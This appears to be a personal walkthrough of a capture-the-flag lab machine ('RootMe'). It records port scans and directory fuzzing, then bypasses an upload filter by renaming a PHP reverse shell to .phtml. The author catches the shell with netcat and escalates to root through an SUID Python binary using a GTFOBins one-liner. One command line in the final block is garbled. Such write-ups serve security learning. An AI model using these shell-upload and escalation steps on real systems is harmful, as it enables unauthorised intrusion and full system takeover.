![[Pasted image 20250629130650.png]]
# Information Gathering - Nmap
Scanning all 65,535 TCP ports and found 2 open ports: 22 and 80
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 12:35 CDT
Nmap scan report for 10.10.225.13
Host is up (0.13s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 23.14 seconds
```
Ran another scan but this time with `-sC` and `-sV` options for more detailed information about those 2 open ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sC -sV $IP -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 12:36 CDT
Nmap scan report for 10.10.225.13
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds
```
Lastly I performed a udp scan against top 1,000 ports but found no open ports
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 12:38 CDT
Nmap scan report for 10.10.225.13
Host is up (0.13s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT STATE SERVICE
207/udp closed at-7
1059/udp closed nimreg
19541/udp closed jcp
21902/udp closed unknown
49194/udp closed unknown
62699/udp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds
```
---
# Footprinting
##### Port 80
I opened up my browser to see the web page on port 80. Below is all I saw. I couldn't find any useful information.
![[Pasted image 20250629123951.png]]
I used `ffuf` to enumerate directories and this directory named `panel` stood out to me.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ ffuf -u http://$IP/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.225.13/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htaccessZhUoKYjp [Status: 200, Size: 616, Words: 115, Lines: 26, Duration: 131ms]
<SNIP>
uploads [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 239ms]
<SNIP>
css [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 128ms]
js [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 127ms]
panel [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 128ms]
```
The `/panel` page appears to be a place where files can be uploaded. We also discovered `/uploads` directory using the ffuf tool, and I suspect that the files uploaded through `/panel` are likely stored in the `/uploads` directory.
![[Pasted image 20250629125019.png]]
I tried uploading `Pentest Monkey`'s php-reverse-shell.php file but it seems the web server is not accepting `.php` files.
![[Pasted image 20250629125527.png]]
I wasn't sure how strictly file filtering was enforced for uploads at this point, so I changed the file extension from `.php` to `phtml` and tried uploading it again -- and it worked!
![[Pasted image 20250629125750.png]]
I browsed to `/uploads` and the file we just uploaded was there.
![[Pasted image 20250629125827.png]]
Successfully connected to the reverse shell :)
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.23.133.183] from (UNKNOWN) [10.10.225.13] 60002
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
17:58:31 up 25 min, 0 users, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
```
Got the `user.txt` flag in `/var/www`
```bash
www-data@rootme:/var/www$ cat user.txt
THM{y0...
```
---
# Privilege Escalation
To access `/root` and obtain the `root.txt` flag, I needed to elevate my privileges. I looked for files with the `SUID` bit set.
```bash
www-data@rootme:/var/www$ find / -type f -perm -4000 2>/dev/null
<SNIP>
...
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
...
<SNIP>
...
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umount
```
`/usr/bin/python` binary stood out to me because If Python binary has SUID bit set to it, I thought I could take advantage of that and easily get a shell. `gtfobins.github.io` confirmed it.
![[Pasted image 20250629130622.png]]
Got the `root.txt` flag!
```bash
", "-p")'rootme:/var/www$ /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
THM{pr...
```